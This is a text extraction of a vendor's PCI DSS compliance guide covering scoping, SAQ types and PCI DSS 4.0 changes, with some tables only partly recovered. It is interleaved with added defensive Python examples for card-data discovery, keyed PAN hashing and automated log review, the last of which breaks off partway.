PCI DSS Implementation Guide 1711199156
SecurityMetrics Guide to PCI DSS Compliance
A Resource for Merchants and Service Providers to Become Compliant
[ EIGHTH EDITION ]
Looking for a PCI compliance solution?
SecurityMetrics, 1275 West 1600 North, Orem, UT 84057
Or contact: marketing@securitymetrics.com
Contents

Introduction  4
  How to Read This Guide  5
  PCI DSS Compliance Overview  8
  Top 10 Failing SAQ sections  10
  Understanding Your PCI DSS Responsibility  12
  Implementing a PCI Compliant Remote Workforce Setup  35
Requirement 8  78
Requirement 9  85
Requirement 10  92
Requirement 11  96
Requirement 12  106
What To Include In An Incident Response Plan  119
Introduction

SECTION CONTENTS
How to Read This Guide  5
PCI DSS Compliance Overview  8
Top 10 Failing SAQ sections  10
Understanding Your PCI DSS Responsibility  12
SAQ Overview  16
PCI DSS Version 4.0  24
Implementing a PCI Compliant Remote Workforce Setup  35
Forensic Perspective  37
Forensic Predictions  42
How to Read This Guide

Whether you’re a new employee with limited PCI knowledge or an experienced system administrator, the purpose of our guide is to help you secure your business and become compliant with PCI DSS requirements. We designed this document as a reference guide to address the most challenging aspects of PCI DSS compliance.

Depending on your background, job role, and your organization’s needs, some sections may be more useful than others. Rather than reading our guide cover to cover, we recommend using it as a resource for your PCI compliance efforts.

NOTE: The information described in this guide is presented as a reference and is not intended to replace security assessments, tests, and services performed by qualified security professionals. Users are encouraged to consult with their companies’ IT professionals to determine their needs and to procure security services tailored to those needs.

90.4% of SecurityMetrics customers who started their SAQ went on to complete it and achieve a passing status in 2022.
The Prioritized Approach is broken down into the following six milestones (based on high-level compliance and security goals):1

[Milestone table; only the following entries were recovered from the page layout]
Milestone 4: Monitor and control access to your systems
Milestone 6: Complete compliance efforts, and ensure all controls are in place
Sub-topics: Perimeter firewalls; Personal firewalls
Requirement 3 (page 57): Protect Stored Account Data
Requirement 4 (page 63): Secure Data Over Open and Public Networks
Requirement 5 (page 67): Protect Against Malicious Software
[Milestones and PCI DSS Requirements table, continued; recovered entries]
Requirement 6 (page 70): Secure Systems and Software Development
  Regularly update and patch systems
  Establish software development processes
Requirement 10 (page 92): Log and Monitor Access
  System logs and alerting
  Establishing log management
  Log management system rules
REQUIREMENT 4
Protect Cardholder Data with Strong Cryptography During Transmission Over Open, Public Networks
• Know where data is transmitted and received
• Strongly encrypt all transmitted cardholder data
• Stop using SSL and early TLS

REQUIREMENT 7
Restrict Access to System Components and Cardholder Data by Business Need to Know
• Restrict access to cardholder data
• Document who has access to the card data environment
• Establish a role-based access control system

REQUIREMENT 10
Log and Monitor All Access to System Components and Cardholder Data
• Implement logging and alerting
• Establish log management
• Create log management and monitoring system rules
TOP 10 FAILING SAQ SECTIONS

We scanned our merchant database in search of the top 10 areas where SecurityMetrics merchant customers struggle to become compliant. Starting with the least adopted requirement, these are the results:

1. Security Policy (Requirement 12.1)
2. Breach Plan
3. Annual Review (Requirement 12.1.1)
4. Requirement Management (Requirement 12.1.1)
5. Incident Response
6. Awareness Program: Implement a formal security awareness program to make all personnel aware of the cardholder data security policy and procedures.
7. Service Providers
8. Personnel Responsibilities: Ensure that the security policy and procedures clearly define information security responsibilities for all personnel.
9. Written Agreements
10. Usage Policies: Verify that the usage policies define all critical devices and personnel authorized to use the devices.
PCI DSS 4.0 introduced many new controls, but the basic definition of what is in-scope has not changed. PCI scope deals with the people, processes, and technologies that must be tested and protected to become PCI compliant. An SAQ is simply a validation tool for merchants and service providers to self-evaluate their PCI DSS compliance.

If the people, process, or technology component stores, processes, or transmits cardholder data, is connected to systems that do, or could impact the security of the cardholder data environment, it’s considered in scope for PCI compliance. This means that PCI requirements apply and the system components must be protected.

System components most likely in scope for your environment may include:
• Networking devices
• Servers
• Switches
• Routers
• Computing devices
• Applications

PCI DSS SCOPING AND NETWORK SEGMENTATION SUPPLEMENT

In May 2017, the PCI Security Standards Council (SSC) released a supplemental guide for scoping and network segmentation.2 The purpose of this guidance was to help organizations identify the systems that need to be considered in scope for PCI DSS compliance and clarify how segmentation can reduce the number of in-scope systems.

You need to understand your business environment—especially what systems are included and how those systems interact with sensitive data. You are then required to apply PCI DSS security requirements to all system components included in, connected to, or that could impact the security of the cardholder data environment (CDE), which is “comprised of the system components, people, and processes that store, process, or transmit CHD or sensitive authentication data.”3
SCOPE YOUR ENVIRONMENT

When scoping your environment, start with the assumption that everything is in scope until it is verified that all necessary controls are in place and actually provide effective segmentation.
• Segment CDE systems from out-of-scope systems and networks (e.g., firewalls configured to block traffic from untrusted networks)
• Support PCI DSS requirements (e.g., time servers, audit log storage servers)

Segmentation prevents out-of-scope systems from communicating with systems in the CDE or from impacting the security of the CDE. An out-of-scope system is a system component that: [the criteria that follow this sentence were not captured from the page]
• Physical access controls
• Logical access controls
• Multi-factor authentication
• Restricting administrative access

MATT HALBLEIB
SecurityMetrics Audit Director
CISSP | CISA | QSA (P2PE) | PA-QSA (P2PE)
To discover your PCI scope and what must be included for your PCI compliance, you need to identify anything that processes, stores, or transmits cardholder data, and then evaluate what people and systems are communicating with your systems. In May 2017, the PCI Council released an informational supplement regarding PCI scoping.2 The document helps reinforce and clarify scoping points that have always been part of PCI scoping. The document can help you work through your annual scoping exercise and can lead you to discover card flows and in-scope systems that you may have previously ignored.

In my experience performing PCI audits, entities often overlook ancillary or support types of systems when doing their own PCI scoping. For instance, call centers usually pay little attention to QA systems, which often store cardholder data in the form of call recordings. These systems are in scope for all PCI requirements!

Simple questions can help you begin the scoping process. For example, ask yourself:
• How do you collect money?
• Why do you handle card data?
• How do you store, process, and transmit this data?

There are always processes you might not realize are in scope. For example, if you are a retail store that swipes cards, do you ever take card numbers over the phone or receive emails with card information? Are any paper orders received? Organizations often have finance, treasury, or risk groups that have post-transaction processes involving cardholder data. It is important to include these processes when determining scope.
Don’t forget power outage procedures where card data is sometimes taken down manually. For example, in most call centers, we’ve discovered that agents are typically unaware that card data should never be written down. But when the application they use for recording cardholder data freezes, they tend to resort to typing or writing it down in a temporary location and retrieving it later for entry. These temporary locations are rarely considered in an organization’s PCI compliance efforts but can lead to increased risk and should be included in your PCI scope.

Paper trails of hand-written information or photocopied payment card data can sometimes fill multiple rooms. Even if card data is ten years old, it is still in PCI scope.

If you access a web page for data entry, there’s a decent chance card data can be found in temporary browser cache files. In addition, it’s the website developer’s responsibility to make sure websites don’t generate cookies or temporary log files with sensitive data. However, you don’t always have full control of your website, which is why it’s important to evaluate all systems for cardholder data, even where you might not expect it to reside.

For organizations with web portals, if someone mistypes card data into an address or phone number field, it is still considered in PCI scope.

You might think your databases are set up to encrypt all cardholder data. However, servers you consider out of scope will often hold temporary files, log files, or backups with lots of unencrypted data. System administrator folders on file servers are also common culprits, as administrators often back up failing servers in a rush to prevent data loss without considering the PCI implications.

Usually, organizations can find ways to fix processes and delete this sensitive data, rather than add servers to their scope. A simple way to find unencrypted card data is by running a card discovery tool, such as SecurityMetrics PANscan®. Organizations need to have methods to detect these mistakes and prevent or delete them. Some use a data loss prevention (DLP) solution to help them with this process.

The next step in determining your PCI scope is to find everything that can communicate with the devices you have identified. This is often the hardest part about scoping because you may not understand what can communicate with your systems. Answer the following questions:
• How do you manage your systems?
• How do you log in to them?
• How do you back up your systems?
• How do you connect to get reports?
• How do you reset passwords?
• How do you administer security controls on your systems?

If you have a server that handles cardholder data, you must always consider what else communicates with that server. Do you have a database server in some other zone you consider out of scope but is reaching that web server to pull reports and save data? Anything that can initiate a connection to an in-scope server that handles cardholder data will be in scope for compliance.

In addition, if your system in the CDE initiates a communication out to a server in another zone, that server will also be in scope. There are very few exceptions to this.
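The card discovery step described above, as an added example that is not part of the guide and is not PANscan: it scans text (logs, exports, backups) for digit runs that look like PANs, keeps only Luhn-valid ones, and reports them masked (first six and last four digits) so the scan output itself does not become another place card data is stored. The log lines are constructed for the example; the card numbers are the standard test numbers.

```python
import re
from typing import List, NamedTuple

# A PAN candidate is 13-19 digits, optionally grouped with single spaces or dashes,
# not glued to other digits on either side.
PAN_CANDIDATE = re.compile(r"(?<!\d)(?:\d[ -]?){12,18}\d(?!\d)")


class Finding(NamedTuple):
    source: str
    line_no: int
    masked_pan: str   # first six and last four only, never the full PAN


def luhn_valid(digits: str) -> bool:
    """Luhn check digit test; filters out most order ids, phone numbers and timestamps."""
    total = 0
    for i, ch in enumerate(reversed(digits)):
        d = int(ch)
        if i % 2 == 1:
            d = d * 2 - 9 if d > 4 else d * 2
        total += d
    return total % 10 == 0


def mask(digits: str) -> str:
    """PCI DSS masking allowance: show at most the first six and last four digits."""
    return digits[:6] + "*" * (len(digits) - 10) + digits[-4:]


def find_pans(source: str, text: str) -> List[Finding]:
    """Scan text (a log, export, backup) line by line and report masked Luhn-valid PANs."""
    findings: List[Finding] = []
    for line_no, line in enumerate(text.splitlines(), start=1):
        for match in PAN_CANDIDATE.finditer(line):
            digits = re.sub(r"[ -]", "", match.group(0))
            # Skip runs of one repeated digit: Luhn-valid but never a real PAN.
            if luhn_valid(digits) and len(set(digits)) > 1:
                findings.append(Finding(source, line_no, mask(digits)))
    return findings


# Constructed application log: a Luhn-invalid order id, a phone number and two test PANs.
SAMPLE_LOG = """\
2024-03-01 09:12:03 app[1234]: order=1234567812345678 status=approved
2024-03-01 09:12:04 app[1234]: retry card=4111111111111111 exp=12/26 amount=42.00
2024-03-01 09:12:09 app[1234]: callback from +1-801-555-0100
2024-03-01 09:13:40 support: customer read 5500 0000 0000 0004 over the phone
"""

if __name__ == "__main__":
    for f in find_pans("constructed.log", SAMPLE_LOG):
        print(f"{f.source}:{f.line_no}: possible PAN {f.masked_pan}")
```

Run against real files, a hit on a server you considered out of scope is exactly the kind of finding that pulls that server into scope.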
SAQ Overview
[Recovered from the SAQ grid; question counts are given for PCI DSS 3.2.1 and 4.0 where the page shows them]

SAQ A
• Fully outsourced card acceptance and processing
• Merchant website provides an iframe or URL that redirects a consumer to a third-party payment processor

SAQ A-EP
3.2.1: 191 Questions, Vuln. Scan | 4.0: 151 Questions, Vuln. Scan

SAQ B
3.2.1: 41 Questions, No Scan | 4.0: 27 Questions, No Scan
• Knuckle buster/imprint machine
• Cellular phone (voice) or stand-alone terminal

SAQ B-IP
• Internet-based stand-alone terminal isolated from other devices on the network

SAQ C
3.2.1: 160 Questions, Vuln. Scan | 4.0: 131 Questions, Vuln. Scan
• View or handle cardholder data via the Internet
• POS with tokenization

SAQ C-VT
3.2.1: 83 Questions, No Scan | 4.0: 54 Questions, No Scan
• One at a time via keyboard into a virtual terminal
• On an isolated network at one location
• No swipe device

SAQ D-Merchant
3.2.1: 329* Questions, Vuln. Scan | 4.0: 251* Questions, Vuln. Scan
• Merchant website accepts payment and does not use a direct post or transparent redirect service
• Electronic storage of card data
• POS system not utilizing tokenization or P2PE
• Merchant stores card data electronically (e.g., email, e-fax, recorded calls, etc.)

SAQ P2PE
• Validated PCI P2PE hardware payment terminal solution only
• Merchant specifies they qualify for the P2PE questionnaire

SAQ D-Service Provider
• Handles card data on behalf of another business
• Provides managed firewalls in another entity's cardholder data environment
• Hosts a business's ecommerce environment/website or controls the flow of ecommerce data.
SAQ A-EP

• Your company only accepts ecommerce transactions.
• All processing of cardholder data–with the exception of the payment page–is entirely outsourced to a PCI DSS validated third-party payment processor.
• Your ecommerce website does not receive cardholder data but controls how consumers–or their cardholder data–are redirected to a PCI DSS validated third-party payment processor.
• If the merchant website is hosted by a third-party provider, the provider is validated to all applicable PCI DSS requirements (e.g., including PCI DSS Appendix A if the provider is a shared hosting provider).

Like most SAQ A merchants, SAQ A-EP merchants have an ecommerce payment environment where the collection and processing of cardholder data have been outsourced to PCI DSS-compliant service providers. Unlike the SAQ A, SAQ A-EP websites control the flow of cardholder data to the service provider (typically using JavaScript or direct post methods).

If you have an ecommerce environment and you are not using a third-party iFrame or fully redirecting users to the service provider’s website for payment collection but your website never receives cardholder data directly, the SAQ A-EP is likely the correct choice for your compliance documentation.
SAQ B

• Your company only uses an imprint machine and/or uses only standalone, dial-out terminals (connected via a phone line to your processor) to take your customers’ payment card information.
• Standalone, dial-out terminals are not connected to any other systems within your environment.
• Standalone, dial-out terminals are not connected to the Internet.
• Your company does not transmit cardholder data over a network (either an internal network or the Internet).
• Any cardholder data your company retains is on paper (e.g., printed reports, receipts), and these documents are not received electronically.
• Your company does not store cardholder data in an electronic format.

Most SAQ B merchants receive cardholder data in person and via mail-order/telephone-order transactions and process these payments using bank-provided payment terminals that are connected to dial-up/analog phone lines. Cardholder data should never be received electronically (via email) or stored electronically. Be sure your terminals are connected to analog lines and not connected to IP networks.

SAQ B-IP

• Your business only uses standalone, PTS-approved Point of Interaction (POI) devices connected via IP to your payment processor to take your customers’ payment card data.
• Standalone IP-connected POI devices are validated to the PTS POI program as listed on the PCI SSC website (excludes SCRs).
• Standalone IP-connected POI devices are not connected to any other systems within your environment.
• The only transmission of cardholder data is from PTS-approved POI devices to the payment processor.
• The POI device doesn’t rely on any other device (e.g., computer, mobile phone, tablet) to connect to the payment processor.
• The business has only paper reports or paper copies of receipts with cardholder data, and these documents are not received electronically.
• Your company does not store cardholder data electronically.

Most SAQ B-IP merchants receive cardholder data in person and via mail-order/telephone-order transactions and process these payments using bank-provided terminals. SAQ B-IP terminals are, however, connected to an IP network and transmit their data over the network instead of an analog connection. This allows for much faster processing times, but security controls must be in place to properly segment and protect payment data being transmitted over the network.
SAQ C

• Your business has a payment application system and an Internet connection on the same device and/or same local area network (LAN).
• The payment application system isn’t connected to any other systems within your environment.
• The POS environment isn’t connected to other locations, and any LAN is for a single location only.
• Any cardholder data your business retains is on paper (e.g., printed reports, receipts), and these documents are not received electronically.
• Your company does not store cardholder data in an electronic format.

Typical SAQ C merchants receive cardholder data in person and via mail-order/telephone-order transactions that are processed using a Point-of-Sale system that is configured to not store the full PAN (credit card number). Typical POS solutions will have multiple POS workstations/registers connected to a back-end server (the server may be hosted by a vendor/third-party). The SAQ C is designed for a simple, single-location POS deployment.

Merchants with multiple locations that are connected to the corporate office should be using the SAQ D.

SAQ C-VT

• Your company only processes payments through a virtual payment terminal accessed by an Internet-connected web browser.
• Your company’s virtual payment terminal solution is provided and hosted by a PCI DSS validated third-party service provider.
• Your company accesses the PCI DSS-compliant virtual payment terminal solution through a computer that is isolated in a single location and is not connected to other locations or systems within your environment.
• Your company’s computer does not have software installed that causes cardholder data to be stored.
• Your company’s computer does not have any attached hardware devices that are used to capture or store cardholder data.
• Your company does not otherwise receive or transmit cardholder data electronically through any channels.
• Any cardholder data your company retains is on paper, and these documents are not received electronically.
• Your company does not store cardholder data in an electronic format.
SAQ P2PE

• All payment processing is through a validated PCI P2PE solution approved and listed by the PCI SSC.
• The only systems in the merchant environment that store, process, or transmit account data are the Point of Interaction (POI) devices, which are approved for use with the validated and PCI-listed P2PE solution.
• You do not otherwise receive or transmit cardholder data electronically.
• There’s no legacy storage of electronic cardholder data in the environment.
• If your business stores cardholder data, this data is only in paper reports or copies of paper receipts and isn’t received electronically.

SAQ D

SAQ D applies to merchants who don’t meet the criteria for any other SAQ type. This SAQ type handles merchants who store card information electronically and do not use a P2PE certified POS system. Examples of SAQ D merchant types include:
• ecommerce merchants who accept cardholder data on their website.
• Merchants with electronic storage of cardholder data.
• Merchants that don’t store cardholder data electronically but that do not meet the criteria of another SAQ type.
• Merchants with environments that might meet the criteria of another SAQ type, but that have additional PCI DSS requirements applicable to their environment.
COMBINING MULTIPLE SAQS

Some merchants will have multiple payment flows that together may not fit any SAQ type besides the SAQ D. For instance, a merchant may have an outsourced ecommerce payment channel that would fit the SAQ A but may also accept card-present transactions using an analog-connected bank terminal (SAQ B).

A merchant with multiple payment channels will likely be required to complete the SAQ D as they would not be able to affirmatively answer the qualifying criteria questions when looking at their multiple payment channels together.

Some merchant banks will allow a merchant to assess each payment channel separately with the SAQ that matches each payment channel. So, in the case of an SAQ A + SAQ B combo environment, the merchant may be able to complete an SAQ A to cover their ecommerce channel and an SAQ B to cover the card-present payment channel and provide their bank with both SAQs.

PCI DATA SECURITY ESSENTIALS EVALUATION TOOL FOR SMALL MERCHANTS

The PCI Council released a payment security tool–the Data Security Essentials (DSE) Evaluation Tool–to simplify security evaluation and increase security awareness for eligible small merchants. The Data Security Essentials Evaluation Tool includes 15 new categories from the PCI Council–based on payment acceptance methods–which will help smaller merchants simplify their compliance process and get the most benefit from their efforts.

“Merchants are only eligible to use a Data Security Essentials evaluation if they have been notified by their acquirer [aka their merchant bank] that it is appropriate for them to do so.”5

To find out more information about DSE evaluations and your possible options, contact your merchant bank.
THE GOAL OF PCI DSS 4.0

Why did the PCI Council make a major rewrite of the PCI DSS when it is considered to be a fairly mature standard?

There are four major reasons for the changes:
1. Ensure the standard continues to meet the security needs of the payments industry
2. Promote security as a continuous process
3. Enhance validation methods and procedures

Evolution Area | Comments
Scoping | Scoping guidance will be a more integral part of the standard itself by providing more detail on requirements for scoping validation. New requirements include tasks for organizations to verify their PCI DSS scope and some additional requirements for service providers.
Protection of Cardholder Data Transmissions | Included are continued enhancements to requirements for the protection of cardholder data in motion throughout the network.
CUSTOMIZED APPROACH

PCI DSS 4.0 introduces the concept that not all security approaches are the same and that there may be many ways to achieve a security objective. Version 4.0 will allow customization of requirements and testing procedures in order to accommodate this.

Many companies have security solutions in place that may meet the intent of a security objective but not meet a specific requirement. This approach could let entities show how their specific solution meets the intent of the security objective and addresses the risk, and therefore provides an alternative way to meet the requirement.

This new approach will take the place of compensating controls in the PCI DSS 4.0 standard. The PCI Council has stated that “Unlike compensating controls, customized validation will not require a business or technical justification for meeting the requirements using alternative methods, as the requirements will now be outcome-based.”7

While this new validation method may sound simple, it will most likely result in more assessment work initially for the entity in order to prepare documentation and risk assessment data for a QSA to evaluate. It will then require specialized testing procedures to be developed by the QSA and agreed upon by the entity.

The customized approach will not be for everyone and will be most suited for entities with mature security and risk assessment processes in place.

The custom process provides the advantage of defining a more permanent solution for compliance validation of specialized security controls. This is different from previous temporary compensating controls in earlier versions of the standard, where you had to document a justification for the control with a business or technical constraint.

Customized Approach Milestones:

The customized approach offers more validation flexibility, but it’s not ideal for everyone. The following figure illustrates where responsibilities lie when using the customized approach:

THE ENTITY
Implements control(s) that meets the intent of the PCI DSS Requirement
Provides documentation that describes the customized implementation
• The who, what, where, when, and how of the controls
• Evidence to prove the controls meet the stated intent
• Evidence of how controls are maintained, and effectiveness is assured

THE ASSESSOR
Plans and conducts the assessment
• Reviews information provided by the entity
• Derives testing procedures based on information provided
• Documents details of testing procedures and results of testing in the ROC
CUSTOMIZED APPROACH AND RISK ASSESSMENTS

As mentioned in the previous section, the Customized Approach is now available. However, before jumping right in, larger organizations and risk assessment teams may want to look at the Defined Approach and Customized Approach so that they understand the differences between the two and can make the right decisions for their organization.

A lot of people are excited about the Customized Approach because it sounds easier to get compliant. In reality, it’s going to be more complicated than it sounds. The Customized Approach requires a lot of work and effort to define what the actual requirements are and how to measure the requirements.

One of the biggest adjustments to PCI 4.0 is the increased use of risk assessments within the Customized and Defined Approaches. Risk assessments for a Customized Approach are a big part of the new standard. Instead of being a simple and quick process, organizations will need to follow a very structured formalized risk assessment.

Now, the expectation is that if you make a change in your environment (e.g., adding a new firewall), you need to do a risk assessment on that change.

If you don’t have a lot of experience with a formal risk assessment, or don’t have a risk department as part of your company, you may need initial help from a third party to get you going and learn how to do these things.

Formal risk assessments may not seem like a big change based on some of the other future dated requirements that have been added to the standard, but this change in PCI DSS 4.0 may result in additional effort in the transition process.
Requirement 1

There were no significant changes.

Requirement 2

There were no significant changes.

Requirement 3

3.2.1 (March 31, 2025)

In the past, if you stored sensitive authentication data before authorization, it was recommended that you should try to encrypt or protect it, but it wasn’t required. Now, it is required.

3.3.3 (March 31, 2025)

Issuers now must encrypt the sensitive authentication data that they may be storing. This may not be a big deal for most issuers at this point, but it may be difficult for some legacy systems where encryption software is not readily available.

3.4.2 (March 31, 2025)

If you’re using remote access technology to access the cardholder data environment (CDE), then you must prevent the copy and relocation of primary account number (PAN) data. This has been mentioned before, but now it will be a requirement. […] addressing this process, but now it needs to be enforced by some technology. There may be settings in your remote access software that have ways of preventing access to certain functions. Depending on what resources you have and your current processes, this requirement may or may not be difficult to implement.

3.5.1.1 (March 31, 2025)

PCI DSS 4.0 also changes the security required on hashing functionality if your system is using a hash method for protecting card data.

Organizations will need to use a keyed cryptographic hash method, which is different from most common hash algorithms in use. So you may need to change your hashing algorithm to something like HMAC, CMAC, or GMAC, with an effective cryptographic strength of at least 128-bits. A code change of this kind could take some effort so you may want to focus on this earlier rather than later.

3.5.1.2 (March 31, 2025)

This requirement discusses the removal of disk-level encryption as an option to protect card data. Now it can only be used for removable media (e.g., a USB drive, an external SSD). You can’t use it anymore on your computer’s hard drive or any kind of non-removable media. If you’re using disk-level encryption for protection, you will need to make some changes.

Requirement 4

4.2.1 (March 31, 2025)

A new requirement in this section will be to carefully document, track, and inventory SSL and TLS certificates in use for the transmission of sensitive data across public networks. Increased tracking will help ensure the certificates’ continued strength and validity. So, it’s just a new process and tracking that needs to be implemented.
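The keyed-hash change in 3.5.1.1 above, as an added example that is not from the guide or from SecurityMetrics: the PAN is hashed with HMAC-SHA-256 under a 256-bit key (well above the 128-bit strength floor), each token carries the id of the key that produced it so keys can be rotated, and lookups compare in constant time. The key store and PANs are constructed; in production the keys would live in an HSM or key-management service, never beside the hashed values.

```python
import hashlib
import hmac
import re
from typing import Dict

# Constructed key store: key id -> 256-bit HMAC key. Stand-in for an HSM or KMS.
KEYS: Dict[str, bytes] = {
    "k1": bytes.fromhex("2b7e151628aed2a6abf7158809cf4f3c2b7e151628aed2a6abf7158809cf4f3c"),
    "k2": bytes.fromhex("603deb1015ca71be2b73aef0857d77811f352c073b6108d72d9810a30914dff4"),
}
CURRENT_KEY_ID = "k2"   # k1 is retired; tokens made under it should be re-hashed


def normalize_pan(pan: str) -> str:
    """Strip separators and require 13-19 digits so the same card always hashes the same."""
    digits = re.sub(r"[ -]", "", pan)
    if not re.fullmatch(r"\d{13,19}", digits):
        raise ValueError("not a PAN")
    return digits


def hash_pan(pan: str, key_id: str = CURRENT_KEY_ID) -> str:
    """Keyed hash (HMAC-SHA-256) of the PAN, prefixed with the id of the key used."""
    mac = hmac.new(KEYS[key_id], normalize_pan(pan).encode(), hashlib.sha256)
    return f"{key_id}${mac.hexdigest()}"


def verify_pan(pan: str, token: str) -> bool:
    """Recompute the token under the key named in it and compare in constant time."""
    key_id, _, digest = token.partition("$")
    if key_id not in KEYS:
        return False
    expected = hmac.new(KEYS[key_id], normalize_pan(pan).encode(), hashlib.sha256).hexdigest()
    return hmac.compare_digest(expected, digest)


def needs_rekey(token: str) -> bool:
    """True when the token was produced under a retired key. Re-hashing needs the
    original PAN (an HMAC cannot be re-keyed from the digest), which is why the key
    id is stored with the token and why rotation has to be planned ahead."""
    return token.partition("$")[0] != CURRENT_KEY_ID


def unkeyed_hash(pan: str) -> str:
    """Plain SHA-256, the pre-4.0 pattern. Kept only for contrast: with no secret key
    there is nothing an attacker who obtains the hashes lacks, so 3.5.1.1 no longer
    accepts it for PAN protection."""
    return hashlib.sha256(normalize_pan(pan).encode()).hexdigest()
```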
Requirement 5

5.3.3 (March 31, 2025)

Organizations will need to scan removable media used in the CDE. Since most antivirus solutions do this or have the capability, it may just require some configuration setting changes. Review the capabilities of the malware solution you are using to see if they have these capabilities.

5.4.1 (March 31, 2025)

One of the bigger changes is that a requirement to have automatic process mechanisms in place to detect and protect personnel against email phishing attacks has been added.

If you’re doing your email in house, you may or may not have had all the controls in place for this yet. If you’ve outsourced emails, confirm with your provider and see what sort of protections they have against phishing attacks.

Requirement 6

6.4.2 (March 31, 2025)

In PCI DSS 3.2.1, a web application firewall or a process to do code reviews was required to protect web applications developed by a company. In March 2025, organizations will need to have a web application firewall in place for any web applications exposed to the Internet.

This standard has been a long time coming and shouldn’t be surprising. There are many solutions, including cloud-based solutions, that can help with this requirement.

6.4.3 (March 31, 2025)

To reduce the possibility of malicious scripts making it onto payment pages, organizations need an inventory of all the known scripts used on those pages.

This inventory must be documented and tracked to ensure that all the scripts used are authorized, and that the integrity has been validated. Review the guidance column for further information on this requirement.

Requirement 7

7.2.4, 7.2.5, 7.2.5.1 (March 31, 2025)

Not much has changed in this section. It’s the basic, role-based access control requirements, and most of the changes are just tightening account reviews and processes around reviews for systems, users, and applications.

Requirement 8

8.3.6 (March 31, 2025)

To strengthen passwords, the minimum length of passwords is moving from 7 to 12 alpha and numeric characters.

Depending on your applications, this could be a simple fix or it may require some code changes. So, start checking now to see if there are any systems in use in your CDE that would have difficulty with this future dated requirement.

8.3.10.1 (March 31, 2025)

Another change in section eight around passwords pertains to service providers. Customers of service providers will now have to change their passwords every 90 days if you’re using just a password for authentication (i.e., you are not using a multi-factor authentication).
Multi-factor authentication will be required for all access to the CDE, not just from external locations. So this would apply to internal administrative access to servers, firewalls, networking gear, etc.

8.5.1 (March 31, 2025)

PCI DSS 4.0 adds a new detail to MFA requirements that might be a bit tricky. Success of all the factors has to happen before authentication, and it can't be known from the process which factor has failed.

Presently, most systems ask for a username and password (i.e., something you know) and only move on to the second factor if you have the correct username/password. This will no longer be allowed.

Both factors will have to be presented and entered without revealing any information about which factor might have been wrong if authentication fails.

8.6.2 (March 31, 2025)

All application and system passwords that could be used for interactive login have additional approval and tracking controls on their use, and can no longer reside in a script or a file.

Requirement 9

There were no significant changes.

Requirement 10

10.4.1.1 (March 31, 2025)

Organizations can no longer review their logs manually.

Few, if any, companies are manually reviewing logs anymore as it's just too much data to effectively review manually. There are many log review tools out there, so it shouldn't be difficult to implement a solution. Manual review of logs is time-consuming and easy to do poorly, so this is a good change.

10.7.2 (March 31, 2025)

All organizations must now detect, alert, and promptly address failures of critical security control systems. This used to be required only for service providers, but has now been extended to everyone.

This means that if you had a firewall or IDS system that went down for some reason, you would have to detect it, generate an alert, and respond to that alert. This update will require additional procedures for merchants to implement. We recommend that you start now to look for solutions.

Requirement 11

11.3.1.2 (March 31, 2025)

Internal vulnerability scanning must now be authenticated. This means that it's not just a scan of ports and services; now, if a service is exposed that requires a credential to access it (e.g., a web app), you need to use those credentials to gain access and test the authenticated port or service.

An important part of this new requirement will be that the credentials used by the vulnerability assessment (VA) scanner must be entered into the system and stored securely. This will have to be a feature of the VA scanning solution and should be something you check with your vendor carefully on.

11.5.1.1 (March 31, 2025)

Another requirement change was on IDS/IPS, so that systems detect and alert on any covert malware communication channels that are being used (e.g., DNS tunneling). This may represent a change to the IDS/IPS system that you are currently using.

11.6.1 (March 31, 2025)

One of the biggest things in section eleven was the addition of a requirement to implement a change and tamper detection mechanism for any payment pages. This requirement addition is a direct result of the increase in ecommerce skimming compromises seen on payment pages in recent years.

Before March 31, 2025, companies will have to deploy a solution that will detect changes to those pages (e.g., script additions, changes to known scripts and code).

This is a great addition to the standard and is absolutely needed for ecommerce websites.

Requirement 12

12.5.2 (Immediately Effective for 4.0 Assessments)

An annual scoping of your card data environment was mentioned in the initial discussion section of previous versions of PCI DSS, but now the Council has moved that into the requirements matrix under section 12 and made it a trackable requirement effective immediately for version 4.0.

So a documented scoping exercise will have to be done by merchants annually, or after any significant changes to the in-scope environment (e.g., people, systems, processes).

12.6.2 (March 31, 2025)

Organizations will need to enforce a more formal Security Awareness Program, where before you could get by with some basic security training.

Organizations will need to document and update their Security Awareness Program at least once every 12 months and as needed to address any new threats and vulnerabilities that may impact the security of their CDE or the information provided to personnel about their role in protecting cardholder data.

12.6.3.1 (March 31, 2025)

The standard now expects a security training program to discuss specific threats and vulnerabilities in your environment, as well as acceptable use of end-user technologies.

For example, if phishing is a big deal for your environment, then you need to address phishing in your training. The training program will also need to be reviewed and updated at least annually.

12.10.7 (March 31, 2025)

Incident response procedures will need to be initiated if stored primary account numbers (PAN) are detected anywhere they are not expected. This means that you are always on the watch for new or errant processes creating repositories of stored PAN outside of expected boundaries.

Periodic review of processes dealing with card data and running a good data discovery tool will be needed to fully say you have satisfied this future-dated requirement.
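As an added example (not from the guide), here is the kind of automated review that 10.4.1.1 and 10.7.2 above call for, run over a handful of constructed syslog-style lines: it raises an alert when one source address fails authentication repeatedly inside a short window, and a separate alert when a critical control (a firewall or IDS that should be emitting a heartbeat) goes quiet. The log format, host names, thresholds and the heartbeat convention are assumptions for the demo; in practice this logic sits in a SIEM or log pipeline and the thresholds are tuned against your own baseline.

```python
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed sample log (not real data): a burst of SSH failures against a
# CDE database host, one benign failed-then-accepted login, and heartbeats
# from two critical controls, one of which stops reporting.
SAMPLE_LOG = """\
2025-03-01T10:00:01Z fw01 heartbeat ok
2025-03-01T10:00:05Z cde-db01 sshd: Failed password for admin from 203.0.113.9
2025-03-01T10:00:09Z cde-db01 sshd: Failed password for admin from 203.0.113.9
2025-03-01T10:00:14Z cde-db01 sshd: Failed password for root from 203.0.113.9
2025-03-01T10:00:20Z cde-db01 sshd: Failed password for admin from 203.0.113.9
2025-03-01T10:00:27Z cde-db01 sshd: Failed password for admin from 203.0.113.9
2025-03-01T10:00:33Z cde-db01 sshd: Failed password for admin from 203.0.113.9
2025-03-01T10:02:10Z cde-app01 sshd: Failed password for deploy from 198.51.100.7
2025-03-01T10:02:30Z cde-app01 sshd: Accepted publickey for deploy from 198.51.100.7
2025-03-01T10:05:01Z fw01 heartbeat ok
2025-03-01T10:15:00Z ids01 heartbeat ok
"""

LINE_RE = re.compile(r"^(\S+) (\S+) (.*)$")            # "<timestamp> <host> <message>" (assumed format)
FAIL_RE = re.compile(r"Failed password for (\S+) from (\S+)")

def parse_ts(s):
    return datetime.strptime(s, "%Y-%m-%dT%H:%M:%SZ")

def parse_line(line):
    """Split one log line into (timestamp, host, message); None if it does not match."""
    m = LINE_RE.match(line)
    return (parse_ts(m.group(1)), m.group(2), m.group(3)) if m else None

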